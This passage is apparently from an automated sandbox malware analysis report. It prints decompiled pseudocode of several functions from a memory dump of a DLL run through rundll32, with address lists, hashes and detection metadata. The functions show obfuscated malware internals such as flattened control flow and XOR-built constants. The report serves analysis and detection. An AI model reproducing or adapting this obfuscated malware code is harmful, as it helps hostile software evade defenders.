						if(_t107 == 0x11f8fc3e) {
							_t107 = 0x2ebf197;
							continue;
						} else {
							if(_t107 == 0x13d7564d) {
								_t107 = 0x32df2d5c;
								_t123 = _t123 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t107 == 0x2725b2a4) {
									E10008EB8(_v360, _v356,  &_v320, _v364, _v348);
									_t125 =  &(_t125[3]);
									_t107 = 0x13d7564d;
									continue;
								} else {
									if(_t107 == 0x2976fc0f) {
										_t123 = _t123 + (_v320 & 0x0000ffff);
									} else {
										if(_t107 == 0x2ab6fad8) {
											_t107 = 0x2976fc0f;
											_t123 = _t123 + _v276 * 0x64;
											continue;
										} else {
											if(_t107 != 0x32df2d5c) {
												goto L14;
											} else {
												_t107 = 0x2ab6fad8;
												_t123 = _t123 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t123;
					}
					_v284 = 0x11c;
					E10018EA4(_v340, _v368,  &_v284, _v352, _v344);
					_t125 =  &(_t125[3]);
					_t107 = 0x2725b2a4;
					L14:
				} while (_t107 != 0x1e073579);
				goto L17;
			}


























                                                                        0x10010f6d
                                                                        0x10010f73
                                                                        0x10010f7d
                                                                        0x10010f85
                                                                        0x10010f8d
                                                                        0x10010f94
                                                                        0x10010f9d
                                                                        0x10010fa1
                                                                        0x10010fa9
                                                                        0x10010fb1
                                                                        0x10010fb9
                                                                        0x10010fc1
                                                                        0x10010fc9
                                                                        0x10010fd8
                                                                        0x10010fdd
                                                                        0x10010fe3
                                                                        0x10010feb
                                                                        0x10010ff3
                                                                        0x10011000
                                                                        0x10011003
                                                                        0x10011007
                                                                        0x1001100f
                                                                        0x10011017
                                                                        0x1001101f
                                                                        0x10011027
                                                                        0x1001102f
                                                                        0x1001103f
                                                                        0x10011048
                                                                        0x10011049
                                                                        0x1001104d
                                                                        0x10011055
                                                                        0x1001105d
                                                                        0x10011062
                                                                        0x10011067
                                                                        0x1001106f
                                                                        0x10011077
                                                                        0x10011081
                                                                        0x10011085
                                                                        0x1001108d
                                                                        0x10011095
                                                                        0x100110a8
                                                                        0x100110ac
                                                                        0x100110b4
                                                                        0x100110b4
                                                                        0x100110c2
                                                                        0x10011143
                                                                        0x00000000
                                                                        0x100110c4
                                                                        0x100110ca
                                                                        0x10011131
                                                                        0x1001113c
                                                                        0x00000000
                                                                        0x100110cc
                                                                        0x100110d2
                                                                        0x1001111a
                                                                        0x1001111f
                                                                        0x10011122
                                                                        0x00000000
                                                                        0x100110d4
                                                                        0x100110d6
                                                                        0x10011187
                                                                        0x100110dc
                                                                        0x100110de
                                                                        0x100110ff
                                                                        0x10011101
                                                                        0x00000000
                                                                        0x100110e0
                                                                        0x100110e6
                                                                        0x00000000
                                                                        0x100110ec
                                                                        0x100110f4
                                                                        0x100110f6
                                                                        0x00000000
                                                                        0x100110f6
                                                                        0x100110e6
                                                                        0x100110de
                                                                        0x100110d6
                                                                        0x100110d2
                                                                        0x100110ca
                                                                        0x1001118a
                                                                        0x10011195
                                                                        0x10011195
                                                                        0x10011152
                                                                        0x10011167
                                                                        0x1001116c
                                                                        0x1001116f
                                                                        0x10011174
                                                                        0x10011174
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: K$H$Z\
                                                                        • API String ID: 0-1080206182
                                                                        • Opcode ID: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
                                                                        • Instruction ID: 3bc7b4ca0c7fcb2c5b05920913665c9c43f334923cd28bf2cbd3076ac86a8cde
                                                                        • Opcode Fuzzy Hash: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
                                                                        • Instruction Fuzzy Hash: D7516771908341DFD319CE22D94545FBBE1EBC8748F108A1EF586AA260D3B5CA89CF97
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001654F, Relevance: 3.9, Strings: 3, Instructions: 122COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E1001654F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t137;
				signed int _t155;
				signed int _t156;
				signed int _t157;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t137);
				_v68 = _v68 & 0x00000000;
				_v72 = 0x40327f;
				_v36 = 0xc85d;
				_v36 = _v36 ^ 0x66282df1;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x1472a435;
				_v64 = 0xf491;
				_v64 = _v64 + 0xa329;
				_v64 = _v64 ^ 0x0001adca;
				_v40 = 0xc364;
				_v40 = _v40 >> 8;
				_v40 = _v40 | 0x488121d4;
				_v40 = _v40 ^ 0x48816408;
				_v52 = 0x6da2;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x0000495a;
				_v8 = 0x312a;
				_v8 = _v8 + 0xffffef42;
				_t155 = 0x2c;
				_v8 = _v8 * 0x65;
				_v8 = _v8 + 0xce6d;
				_v8 = _v8 ^ 0x000de244;
				_v20 = 0x8561;
				_v20 = _v20 | 0x5ebc884e;
				_v20 = _v20 + 0x1144;
				_v20 = _v20 + 0xfffffd3c;
				_v20 = _v20 ^ 0x5ebcfa0f;
				_v12 = 0x1c9b;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 / _t155;
				_v12 = _v12 + 0x2960;
				_v12 = _v12 ^ 0x00001be2;
				_v60 = 0x3552;
				_t156 = 0x2b;
				_v60 = _v60 / _t156;
				_v60 = _v60 ^ 0x00001bfb;
				_v24 = 0xfa61;
				_v24 = _v24 >> 4;
				_v24 = _v24 | 0xfe7fc8bf;
				_v24 = _v24 ^ 0xfe7fec18;
				_v44 = 0xf8e3;
				_t157 = 0x73;
				_v44 = _v44 * 0x4c;
				_v44 = _v44 ^ 0x0049ee51;
				_v16 = 0x71dd;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 << 0xd;
				_v16 = _v16 * 0xd;
				_v16 = _v16 ^ 0x0016ae67;
				_v56 = 0x9b34;
				_v56 = _v56 / _t157;
				_v56 = _v56 ^ 0x000036fa;
				_v28 = 0xc6c;
				_v28 = _v28 + 0xfffffa1a;
				_v28 = _v28 + 0xffff7ee3;
				_v28 = _v28 ^ 0xffff83ef;
				_v48 = 0x101f;
				_v48 = _v48 | 0x367cb3d5;
				_v48 = _v48 ^ 0x367cc432;
				_v32 = 0x8972;
				_v32 = _v32 + 0x5a70;
				_v32 = _v32 ^ 0x29e9990a;
				_v32 = _v32 ^ 0x29e93145;
				_push(0x100015f0);
				_push(_v40);
				E10013D3D(E1001BF25(_v36, _v64, _v32), _v32, _v52, _v8,  &_v592, _v20, _v36, _v12);
				E1001C5F7(_v60, _v24, _v44, _v16, _t148);
				return E10003CA0(_v56, _v28, _v48,  &_v592, _v32);
			}

























                                                                        0x10016559
                                                                        0x1001655c
                                                                        0x1001655f
                                                                        0x10016560
                                                                        0x10016561
                                                                        0x10016566
                                                                        0x1001656c
                                                                        0x10016573
                                                                        0x1001657a
                                                                        0x10016581
                                                                        0x10016585
                                                                        0x1001658c
                                                                        0x10016593
                                                                        0x1001659a
                                                                        0x100165a1
                                                                        0x100165a8
                                                                        0x100165ac
                                                                        0x100165b3
                                                                        0x100165ba
                                                                        0x100165c1
                                                                        0x100165c4
                                                                        0x100165cb
                                                                        0x100165d2
                                                                        0x100165df
                                                                        0x100165e2
                                                                        0x100165e5
                                                                        0x100165ec
                                                                        0x100165f3
                                                                        0x100165fa
                                                                        0x10016601
                                                                        0x10016608
                                                                        0x1001660f
                                                                        0x10016616
                                                                        0x1001661d
                                                                        0x10016628
                                                                        0x1001662b
                                                                        0x10016632
                                                                        0x10016639
                                                                        0x10016643
                                                                        0x10016648
                                                                        0x1001664d
                                                                        0x10016654
                                                                        0x1001665b
                                                                        0x1001665f
                                                                        0x10016666
                                                                        0x1001666d
                                                                        0x10016678
                                                                        0x10016679
                                                                        0x1001667c
                                                                        0x10016683
                                                                        0x1001668a
                                                                        0x1001668e
                                                                        0x10016696
                                                                        0x10016699
                                                                        0x100166a0
                                                                        0x100166ac
                                                                        0x100166af
                                                                        0x100166b6
                                                                        0x100166bd
                                                                        0x100166c4
                                                                        0x100166cb
                                                                        0x100166d2
                                                                        0x100166d9
                                                                        0x100166e0
                                                                        0x100166e7
                                                                        0x100166ee
                                                                        0x100166f5
                                                                        0x100166fc
                                                                        0x10016703
                                                                        0x10016708
                                                                        0x10016734
                                                                        0x10016746
                                                                        0x1001676a

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D$E1)$QI
                                                                        • API String ID: 0-3224676359
                                                                        • Opcode ID: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
                                                                        • Instruction ID: 4748c6fc59a3130118217356d11503de5a80fd968bd88dd6c5efbc71458b5f5e
                                                                        • Opcode Fuzzy Hash: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
                                                                        • Instruction Fuzzy Hash: 7051DE75D0120DABEF08CFA5D98A8EEBBB2FF04314F208159E415B62A0D7B95A45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000213E, Relevance: 3.9, Strings: 3, Instructions: 107COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E1000213E(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* _t117;
				void* _t119;
				intOrPtr* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				intOrPtr* _t138;

				_v52 = _v52 & 0x00000000;
				_v56 = 0x538da4;
				_v28 = 0x44a2;
				_v28 = _v28 + 0xffff49a8;
				_v28 = _v28 ^ 0x9ec4eed9;
				_v28 = _v28 ^ 0x613b19df;
				_v24 = 0xfb1d;
				_v24 = _v24 | 0x73dd884d;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x000060fc;
				_v20 = 0x4538;
				_v20 = _v20 << 1;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0000423d;
				_v16 = 0x1a69;
				_v16 = _v16 + 0x19e4;
				_v16 = _v16 << 6;
				_t123 = 0x59;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 ^ 0x067cf58b;
				_v12 = 0x7ce6;
				_v12 = _v12 | 0x92d22600;
				_v12 = _v12 >> 3;
				_v12 = _v12 | 0x69c09952;
				_v12 = _v12 ^ 0x7bda88d4;
				_v8 = 0xdbf1;
				_v8 = _v8 >> 2;
				_t138 = _a4;
				_v8 = _v8 * 0x21;
				_t124 = 0x64;
				_v8 = _v8 / _t123;
				_v8 = _v8 ^ 0x00003399;
				_v44 = 0x6316;
				_v44 = _v44 / _t124;
				_v44 = _v44 ^ 0x000016b9;
				_v40 = 0xc759;
				_v40 = _v40 << 5;
				_v40 = _v40 | 0x59fc130f;
				_v40 = _v40 ^ 0x59fcaabc;
				_v36 = 0xd1fd;
				_t125 = 0x6d;
				_v36 = _v36 / _t125;
				_v36 = _v36 ^ 0x863f9c53;
				_v36 = _v36 ^ 0x863f9a9b;
				_v32 = 0x7363;
				_v32 = _v32 + 0xffffb442;
				_v32 = _v32 + 0xab3e;
				_v32 = _v32 ^ 0x0000a443;
				_v48 = 0x2890;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x00113212;
				_t117 =  *((intOrPtr*)(_t138 + 0x1c))( *_t138, 1, 0);
				_t145 = _t117;
				if(_t117 != 0) {
					_push(_v20);
					_push(_v24);
					_t119 = E10012164(0x10001338, _v28, _t145);
					_t140 = _t119;
					_push(_t119);
					_push(_v44);
					_push( *_t138);
					_push(_v8);
					_t120 = E10003892(_v16, _v12);
					if(_t120 != 0) {
						 *_t120();
					}
					E1001C5F7(_v40, _v36, _v32, _v48, _t140);
				}
				return 0;
			}























                                                                        0x10002144
                                                                        0x1000214a
                                                                        0x10002151
                                                                        0x10002158
                                                                        0x1000215f
                                                                        0x10002166
                                                                        0x1000216d
                                                                        0x10002174
                                                                        0x1000217b
                                                                        0x1000217f
                                                                        0x10002186
                                                                        0x1000218d
                                                                        0x10002190
                                                                        0x10002193
                                                                        0x1000219a
                                                                        0x100021a1
                                                                        0x100021a8
                                                                        0x100021b3
                                                                        0x100021b6
                                                                        0x100021b9
                                                                        0x100021c0
                                                                        0x100021c7
                                                                        0x100021ce
                                                                        0x100021d2
                                                                        0x100021d9
                                                                        0x100021e0
                                                                        0x100021e7
                                                                        0x100021ef
                                                                        0x100021f2
                                                                        0x100021fa
                                                                        0x100021fb
                                                                        0x10002200
                                                                        0x10002207
                                                                        0x10002215
                                                                        0x1000221a
                                                                        0x10002221
                                                                        0x10002228
                                                                        0x1000222c
                                                                        0x10002233
                                                                        0x1000223a
                                                                        0x10002244
                                                                        0x10002249
                                                                        0x1000224c
                                                                        0x10002253
                                                                        0x1000225a
                                                                        0x10002261
                                                                        0x10002268
                                                                        0x1000226f
                                                                        0x10002276
                                                                        0x10002283
                                                                        0x10002286
                                                                        0x1000228f
                                                                        0x10002292
                                                                        0x10002294
                                                                        0x10002297
                                                                        0x1000229f
                                                                        0x100022a5
                                                                        0x100022aa
                                                                        0x100022ac
                                                                        0x100022ad
                                                                        0x100022b0
                                                                        0x100022b2
                                                                        0x100022bb
                                                                        0x100022c5
                                                                        0x100022c7
                                                                        0x100022c7
                                                                        0x100022d6
                                                                        0x100022de
                                                                        0x100022e5

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =B$cs$|
                                                                        • API String ID: 0-3098575777
                                                                        • Opcode ID: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
                                                                        • Instruction ID: f3f3b864e56cb41531de165bc9f4fd19ac00324e8386bf07003281ad5c508310
                                                                        • Opcode Fuzzy Hash: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
                                                                        • Instruction Fuzzy Hash: 39512371D00209EBEF08CFA1C94A6EEBBB2FB08314F208059D511B6290D7BA5B54CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005EB9, Relevance: 3.9, Strings: 3, Instructions: 106COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10005EB9(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t95;
				intOrPtr _t97;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr _t123;

				_v28 = 0x51db;
				_v28 = _v28 * 0x56;
				_v28 = _v28 ^ 0xf2cb6318;
				_v28 = _v28 ^ 0xf2d01fca;
				_v12 = 0x641f;
				_t107 = 0x36;
				_v12 = _v12 * 0x49;
				_v12 = _v12 ^ 0x001cda68;
				_v24 = 0xc595;
				_v24 = _v24 | 0x40e4949d;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0103f279;
				_v36 = 0xae24;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 << 1;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x0001302d;
				_v20 = 0x229b;
				_v20 = _v20 | 0xaeee7ef1;
				_v20 = _v20 ^ 0xaeee687d;
				_v8 = 0x637e;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x000003e0;
				_v4 = 0xedda;
				_v4 = _v4 | 0x32cb1c6d;
				_v4 = _v4 ^ 0x32cbfe7d;
				_v16 = 0xace9;
				_v16 = _v16 * 3;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x00006a5d;
				_v32 = 0xe450;
				_v32 = _v32 | 0xfff2f3f7;
				_v32 = _v32 ^ 0x3a9b7228;
				_v32 = _v32 ^ 0xc569ebde;
				_t95 = E10014237();
				_t120 = _a4;
				_t122 = _t95;
				_v28 = 0x89bb;
				_v28 = _v28 ^ 0xf4290def;
				_v28 = _v28 + 0xffff042c;
				_v28 = _v28 ^ 0xf4288880;
				_t124 = _t120 + 0x24;
				_t106 = E1001C424(_t120 + 0x24, _v36);
				_t97 =  *((intOrPtr*)(_t120 + 8));
				if(_t97 != _v28 && _t97 != _t122) {
					_t110 =  *((intOrPtr*)(_t120 + 0x18));
					if(_t110 != _v28 && _t110 != _t122) {
						_t121 = _a8;
						_t111 =  *_t121;
						if(E10008B2D(_t111, _t106) == 0) {
							_push(_t111);
							_t123 = E100157E8(0x234);
							if(_t123 != 0) {
								_t83 = _t123 + 0x2c; // 0x2c
								E10015891(_t124, _t83, _v4, _v16, _v32);
								 *((intOrPtr*)(_t123 + 0x24)) = _t106;
								 *((intOrPtr*)(_t123 + 0x1c)) =  *_t121;
								 *_t121 = _t123;
							}
						}
					}
				}
				return 1;
			}






















                                                                        0x10005ebc
                                                                        0x10005ecf
                                                                        0x10005ed3
                                                                        0x10005edb
                                                                        0x10005ee3
                                                                        0x10005ef2
                                                                        0x10005ef3
                                                                        0x10005ef7
                                                                        0x10005eff
                                                                        0x10005f07
                                                                        0x10005f0f
                                                                        0x10005f14
                                                                        0x10005f1c
                                                                        0x10005f24
                                                                        0x10005f29
                                                                        0x10005f2d
                                                                        0x10005f32
                                                                        0x10005f3a
                                                                        0x10005f42
                                                                        0x10005f4a
                                                                        0x10005f52
                                                                        0x10005f60
                                                                        0x10005f64
                                                                        0x10005f6c
                                                                        0x10005f74
                                                                        0x10005f7c
                                                                        0x10005f84
                                                                        0x10005f91
                                                                        0x10005f95
                                                                        0x10005f9a
                                                                        0x10005fa2
                                                                        0x10005faa
                                                                        0x10005fb2
                                                                        0x10005fba
                                                                        0x10005fca
                                                                        0x10005fcf
                                                                        0x10005fd3
                                                                        0x10005fd5
                                                                        0x10005fdd
                                                                        0x10005fe5
                                                                        0x10005fed
                                                                        0x10005ff5
                                                                        0x10006007
                                                                        0x10006009
                                                                        0x10006011
                                                                        0x10006017
                                                                        0x1000601e
                                                                        0x10006024
                                                                        0x1000602a
                                                                        0x10006033
                                                                        0x1000603d
                                                                        0x10006048
                                                                        0x1000604d
                                                                        0x10006053
                                                                        0x10006060
                                                                        0x10006065
                                                                        0x1000606d
                                                                        0x10006070
                                                                        0x10006070
                                                                        0x1000604d
                                                                        0x10006033
                                                                        0x1000601e
                                                                        0x1000607c

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P$]j$~c
                                                                        • API String ID: 0-2734922740
                                                                        • Opcode ID: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
                                                                        • Instruction ID: ea7cc22da0d58e888ac6ae18cd3838caf37ee5c895773eb993b6b9e4d83255ea
                                                                        • Opcode Fuzzy Hash: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
                                                                        • Instruction Fuzzy Hash: 9B41E2755083429FD358CF21D58641BFBE1FB88798F104A1DF4DAA6264C374EA89CF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10008816, Relevance: 3.8, Strings: 3, Instructions: 99COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10008816(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
				void* _t108;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t133;

				_v28 = 0x78e3;
				_v28 = _v28 | 0x7135a14a;
				_v28 = _v28 + 0x1554;
				_v28 = _v28 ^ 0x7136354d;
				_v8 = 0x9c2;
				_t117 = 0x5f;
				_v8 = _v8 / _t117;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xd7261730;
				_v8 = _v8 ^ 0xd7260392;
				_v24 = 0xd04a;
				_v24 = _v24 + 0xa8bc;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0xbc833dba;
				_v40 = 0x60a0;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x000011f0;
				_v32 = 0x3bcc;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x001da571;
				_v20 = 0xf201;
				_t118 = 0x6a;
				_v20 = _v20 / _t118;
				_v20 = _v20 | 0xe2b46b61;
				_t119 = 0x7b;
				_t133 = _a4;
				_v20 = _v20 / _t119;
				_v20 = _v20 ^ 0x01d7ce84;
				_v36 = 0x5b49;
				_v36 = _v36 * 0x73;
				_v36 = _v36 ^ 0x48cc9d1b;
				_v36 = _v36 ^ 0x48e5c7c4;
				_v16 = 0xd187;
				_v16 = _v16 << 5;
				_v16 = _v16 | 0x08003ce7;
				_v16 = _v16 + 0xe504;
				_v16 = _v16 ^ 0x081b14b1;
				_v12 = 0x85bb;
				_v12 = _v12 + 0xcd9e;
				_v12 = _v12 | 0x9f7708de;
				_v12 = _v12 ^ 0x14303fed;
				_v12 = _v12 ^ 0x8b4777c9;
				_t108 =  *((intOrPtr*)(_t133 + 0x1c))( *_t133, 1, 0);
				_t137 = _t108;
				if(_t108 != 0) {
					E10014E4B( &_v116, _v28, _v8, _v24);
					_v52 =  &_v116;
					_v48 = E100093FA(_v40, _v32, _t137,  &_v44);
					 *((intOrPtr*)(_t133 + 0x1c))( *_t133, 0xa,  &_v52);
					E1001C5F7(_v20, _v36, _v16, _v12, _v48);
				}
				return 0;
			}





















                                                                        0x1000881c
                                                                        0x10008825
                                                                        0x1000882c
                                                                        0x10008833
                                                                        0x1000883a
                                                                        0x10008847
                                                                        0x1000884c
                                                                        0x10008851
                                                                        0x10008855
                                                                        0x1000885c
                                                                        0x10008863
                                                                        0x1000886a
                                                                        0x10008871
                                                                        0x10008875
                                                                        0x1000887c
                                                                        0x10008883
                                                                        0x10008887
                                                                        0x1000888e
                                                                        0x10008895
                                                                        0x10008899
                                                                        0x1000889d
                                                                        0x100088a4
                                                                        0x100088ae
                                                                        0x100088b3
                                                                        0x100088b8
                                                                        0x100088c2
                                                                        0x100088c5
                                                                        0x100088c8
                                                                        0x100088cb
                                                                        0x100088d2
                                                                        0x100088e1
                                                                        0x100088e4
                                                                        0x100088eb
                                                                        0x100088f2
                                                                        0x100088f9
                                                                        0x100088fd
                                                                        0x10008904
                                                                        0x1000890b
                                                                        0x10008912
                                                                        0x10008919
                                                                        0x10008920
                                                                        0x10008927
                                                                        0x1000892e
                                                                        0x10008937
                                                                        0x1000893a
                                                                        0x1000893c
                                                                        0x1000894a
                                                                        0x1000895b
                                                                        0x10008969
                                                                        0x10008974
                                                                        0x10008986
                                                                        0x1000898b
                                                                        0x10008994

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: I[$M56q$<
                                                                        • API String ID: 0-676366452
                                                                        • Opcode ID: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
                                                                        • Instruction ID: feb926e86b64a6eeca90413cc5403c2004b8354c474c07f5ba1cecbf70788985
                                                                        • Opcode Fuzzy Hash: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
                                                                        • Instruction Fuzzy Hash: 4241EF75D0020DEBEF08CFA0C94A9EEBBB1FF04304F208159D511B6290D7B95A59DF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10004A2B, Relevance: 3.8, Strings: 3, Instructions: 96COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E10004A2B(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				void* _t87;
				void* _t92;
				void* _t94;
				void* _t96;
				signed int _t102;
				void* _t104;
				signed int* _t106;

				_t106 =  &_v48;
				_v16 = 0x385f10;
				asm("stosd");
				_t94 = __ecx;
				_t104 = 0;
				_t96 = 0x34518db6;
				asm("stosd");
				asm("stosd");
				_v36 = 0xcbb3;
				_v36 = _v36 | 0xf42c2371;
				_v36 = _v36 ^ 0x43021788;
				_v36 = _v36 + 0x4a8d;
				_v36 = _v36 ^ 0xb72f589f;
				_v40 = 0x92a4;
				_t102 = 0x4a;
				_v40 = _v40 * 0x57;
				_v40 = _v40 << 3;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00036b7d;
				_v44 = 0xfc25;
				_v44 = _v44 >> 4;
				_v44 = _v44 << 2;
				_v44 = _v44 | 0xbf219be2;
				_v44 = _v44 ^ 0xbf219961;
				_v48 = 0xa043;
				_v48 = _v48 + 0xffff5a3d;
				_v48 = _v48 / _t102;
				_v48 = _v48 | 0x078bf529;
				_v48 = _v48 ^ 0x07ff8e41;
				_v20 = 0x3370;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00001c98;
				_v24 = 0x4528;
				_v24 = _v24 | 0xa2a77225;
				_v24 = _v24 ^ 0x1237b29c;
				_v24 = _v24 ^ 0xb090e9f5;
				_v28 = 0xec9c;
				_v28 = _v28 | 0x23d683f6;
				_v28 = _v28 >> 0xf;
				_v28 = _v28 + 0xffff32f8;
				_v28 = _v28 ^ 0xffff48c1;
				_v32 = 0x5f5a;
				_v32 = _v32 ^ 0xd2da3bda;
				_v32 = _v32 + 0xe7f3;
				_v32 = _v32 + 0xffff294c;
				_v32 = _v32 ^ 0xd2da16fe;
				do {
					while(_t96 != 0x1bdf2e1f) {
						if(_t96 == 0x309c6e61) {
							_t92 = E10007E30();
							_t106 = _t106 - 0xc + 0xc;
							_t96 = 0x1bdf2e1f;
							_t104 = _t104 + _t92;
							continue;
						} else {
							if(_t96 == 0x34518db6) {
								_t96 = 0x309c6e61;
								continue;
							}
						}
						goto L7;
					}
					_t87 = E10007544(_v20, _v24, _v28, _t94 + 4, _v32);
					_t106 =  &(_t106[3]);
					_t96 = 0x25e8f6f4;
					_t104 = _t104 + _t87;
					L7:
				} while (_t96 != 0x25e8f6f4);
				return _t104;
			}




















                                                                        0x10004a2b
                                                                        0x10004a2e
                                                                        0x10004a42
                                                                        0x10004a43
                                                                        0x10004a47
                                                                        0x10004a49
                                                                        0x10004a53
                                                                        0x10004a54
                                                                        0x10004a55
                                                                        0x10004a5d
                                                                        0x10004a65
                                                                        0x10004a6d
                                                                        0x10004a75
                                                                        0x10004a7d
                                                                        0x10004a8a
                                                                        0x10004a8b
                                                                        0x10004a8f
                                                                        0x10004a94
                                                                        0x10004a99
                                                                        0x10004aa1
                                                                        0x10004aa9
                                                                        0x10004aae
                                                                        0x10004ab3
